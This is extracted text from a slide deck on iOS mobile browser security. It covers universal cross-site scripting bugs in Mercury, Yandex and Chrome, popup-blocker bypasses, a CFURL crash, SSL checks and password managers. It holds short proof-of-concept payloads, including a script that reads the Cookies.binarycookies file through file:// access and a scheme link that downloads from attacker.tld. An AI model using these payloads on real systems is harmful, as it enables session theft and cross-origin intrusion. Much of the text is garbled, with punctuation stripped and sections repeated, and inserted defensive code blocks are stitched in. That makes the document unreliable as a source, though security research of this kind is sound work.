bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/

Questions?

lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter: @runicpl, @h0wlu
Thank you
UXSS: Universal Cross-Site Scripting

CVE-2013-6893: UXSS in Mercury Browser

CVE-2013-6893 Mercury UXSS
w = window.open('about:blank')
mbexec://$(WINDOW_ID)/[ "command":"window.open", "target":1234, "url":"about:blank" ]
Math.random()
[webView loadRequest: … "about:blank" …]
cross-frame forgery

CVE-2013-6893 Mercury UXSS
w.document.write('Hi')
mbexec://$(WINDOW_ID)/[ "command":"window.document.write", "target":1234, "html":"Hi" ]
[webView stringByEvaluatingJavaScriptFromString: @"document.write('Hi')"]

CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>'); …and it just works in accounts.google.com

CVE-2013-7197: UXSS in Yandex.Browser

CVE-2013-7197 Yandex UXSS
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect child window after window.open() -> UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome

CVE-2012-2899 Chrome UXSS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]

CVE-2012-2899 Chrome UXSS
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and local files

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]

Safe cross-tab document.write
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
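The Yandex case (origin checked on window.open() but not on document.write()) and the "safe cross-tab document.write" slides describe the same design rule from two sides: a cross-tab write is safe only when the caller's origin is compared with the target tab's current document origin at write time, with about:blank inheriting its opener's origin. The following is an added example, not code from the slides or from any of the browsers they discuss: a JavaScript model of a multi-tab bridge in which a naive variant checks only at open time and a hardened variant re-checks on every write. The TabRegistry, the two bridge classes and the sample URLs are constructed for the example.

```javascript
'use strict';

// Resolve the security origin a cross-tab bridge should attribute to a tab.
// about:blank has no origin of its own: it inherits the origin of the opener
// that created the tab, which is why loading the opener's HTML with
// baseURL about:blank is the safe form of cross-tab document.write.
function originOf(urlString, openerOrigin) {
  if (urlString === 'about:blank') return openerOrigin;
  let origin;
  try {
    origin = new URL(urlString).origin;
  } catch (e) {
    return null;                 // unparseable URL: no origin at all
  }
  // file:, data: and similar schemes give the opaque origin "null";
  // two opaque origins are never the same origin.
  return origin === 'null' ? null : origin;
}

function sameOrigin(a, b) {
  return a !== null && b !== null && a === b;
}

// Minimal model of a multi-tab browser: each tab records its current URL and
// the origin of the document that opened it.
class TabRegistry {
  constructor() {
    this.tabs = new Map();
    this.nextId = 1;
  }
  open(callerUrl, targetUrl) {
    const id = this.nextId++;
    this.tabs.set(id, { url: targetUrl, openerOrigin: originOf(callerUrl, null) });
    return id;
  }
  // Navigating a window you opened to another origin is allowed by the web
  // platform, so the registry just records the new URL.
  navigate(id, newUrl) {
    this.tabs.get(id).url = newUrl;
  }
  currentOrigin(id) {
    const tab = this.tabs.get(id);
    return originOf(tab.url, tab.openerOrigin);
  }
}

// The CVE-2013-7197 pattern from the slides: the origin check runs when the
// bridge handles window.open(), and document.write() trusts that stale result.
class NaiveBridge {
  constructor(registry) {
    this.registry = registry;
  }
  open(callerUrl, targetUrl) {
    const caller = originOf(callerUrl, null);
    if (!sameOrigin(caller, originOf(targetUrl, caller))) return null;  // refused
    return this.registry.open(callerUrl, targetUrl);
  }
  write(callerUrl, tabId) {
    return true;                 // no re-check: writes into whatever the tab shows now
  }
}

// Hardened bridge: every privileged cross-tab command compares the caller's
// origin with the target tab's *current* document origin.
class CheckedBridge extends NaiveBridge {
  write(callerUrl, tabId) {
    return sameOrigin(originOf(callerUrl, null), this.registry.currentOrigin(tabId));
  }
}

// Run the same three cases through a bridge class and report what it permits.
// The URLs are constructed sample values.
function runScenario(BridgeClass) {
  const registry = new TabRegistry();
  const bridge = new BridgeClass(registry);
  const opener = 'https://site-a.example/page.html';
  const other = 'https://site-b.example/login';
  const results = {};

  // 1. Same-origin child, navigated to another origin before the write.
  const child = bridge.open(opener, 'https://site-a.example/child.html');
  registry.navigate(child, other);
  results.writeAfterRedirect = bridge.write(opener, child);

  // 2. about:blank child: inherits the opener's origin, so the write is legitimate.
  const blank = bridge.open(opener, 'about:blank');
  results.writeToAboutBlank = bridge.write(opener, blank);

  // 3. Direct cross-origin open is refused by both bridges.
  results.crossOriginOpenRefused = bridge.open(opener, other) === null;
  return results;
}
```

Both bridges refuse a direct cross-origin open and both allow the about:blank write; only the hardened one refuses the write once the child has been navigated elsewhere, because it asks the registry for the tab's origin at the moment of the write.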
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] -> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) -> NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5)
  CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other with an .html filename

JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);
  x.send();
  alert(x.responseText);
}
</script>

JS without Same-Origin-Policy
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
In this presentation
• iOS Browsers, UIWebView & WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers

Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
• Native (WebKit) vs Application (bolted-on)
• Bridge (internal) vs Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
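The popup-blocker, URI-scheme and CFURL slides above all come down to one decision a browser app makes before a URL reaches a native handler: who initiated the navigation, which kind of scheme it uses, and whether the string is even well-formed. The following is an added example, not code from the slides or from any of the browsers they discuss: a JavaScript navigation policy that blocks malformed percent-encoding and unparseable URLs before any native URL API sees them, only lets the app's own code issue internal bridge-scheme commands, and only lets a user-initiated top-level navigation hand off to an externally registered scheme. The scheme sets, the request shape and the sample URLs are constructed for the example; "scheme:" stands in for an app's internal bridge scheme.

```javascript
'use strict';

// Schemes WebKit renders itself; anything else is handed to a native handler
// (the app's own bridge, or another app registered for the scheme).
const WEB_SCHEMES = new Set(['http:', 'https:', 'about:']);
// Constructed stand-in for an app's internal bridge scheme ("scheme://download/…"
// and "scheme://add-filter?url=" on the slides).
const INTERNAL_BRIDGE_SCHEMES = new Set(['scheme:']);

// A percent sign must introduce exactly two hex digits; "http://%" and
// "http://%5" fail this test before any native URL parser sees them.
function hasMalformedPercentEncoding(s) {
  return /%(?![0-9A-Fa-f]{2})/.test(s);
}

// Decide what to do with a navigation request before it reaches a native
// URL handler. req: { url, isMainFrame, userGesture, initiator: 'page' | 'app' }
// Returns 'allow', 'block', or 'ask' (confirm with the user first).
function navigationPolicy(req) {
  if (hasMalformedPercentEncoding(req.url)) return 'block';
  let u;
  try {
    u = new URL(req.url);    // "http://%5c" decodes to a forbidden host character and is rejected here
  } catch (e) {
    return 'block';
  }
  if (WEB_SCHEMES.has(u.protocol)) return 'allow';
  // Bridge commands are valid only when the app's own JavaScript issues them;
  // page content must never be able to drive them through a URL.
  if (INTERNAL_BRIDGE_SCHEMES.has(u.protocol)) {
    return req.initiator === 'app' ? 'allow' : 'block';
  }
  // Registered external scheme: only a user-initiated top-level navigation may
  // launch another app, never an <iframe src> or a scripted redirect.
  if (!req.isMainFrame || !req.userGesture) return 'block';
  return 'ask';
}

// Constructed sample requests covering each branch of the policy.
function evaluateSamples() {
  const samples = {
    normalPage:      { url: 'https://example.com/', isMainFrame: true, userGesture: false, initiator: 'page' },
    framedExtScheme: { url: 'googlechrome://example.com', isMainFrame: false, userGesture: false, initiator: 'page' },
    tappedExtScheme: { url: 'googlechrome://example.com', isMainFrame: true, userGesture: true, initiator: 'page' },
    pageBridgeCmd:   { url: 'scheme://download/http://example.com/README.html', isMainFrame: true, userGesture: true, initiator: 'page' },
    appBridgeCmd:    { url: 'scheme://download/https://example.com/report.pdf', isMainFrame: true, userGesture: true, initiator: 'app' },
    truncatedEscape: { url: 'http://%5', isMainFrame: true, userGesture: true, initiator: 'page' },
    forbiddenHost:   { url: 'http://%5c', isMainFrame: true, userGesture: true, initiator: 'page' },
  };
  const out = {};
  for (const [name, req] of Object.entries(samples)) out[name] = navigationPolicy(req);
  return out;
}
```

The two percent-encoding cases show the layering: a truncated escape is caught by the cheap syntactic check, while "%5c" is syntactically fine and is only rejected because the URL parser refuses the decoded host; a native handler that dereferenced the result of a failed parse would be the null-pointer case on the slides, so the policy never forwards either.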
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
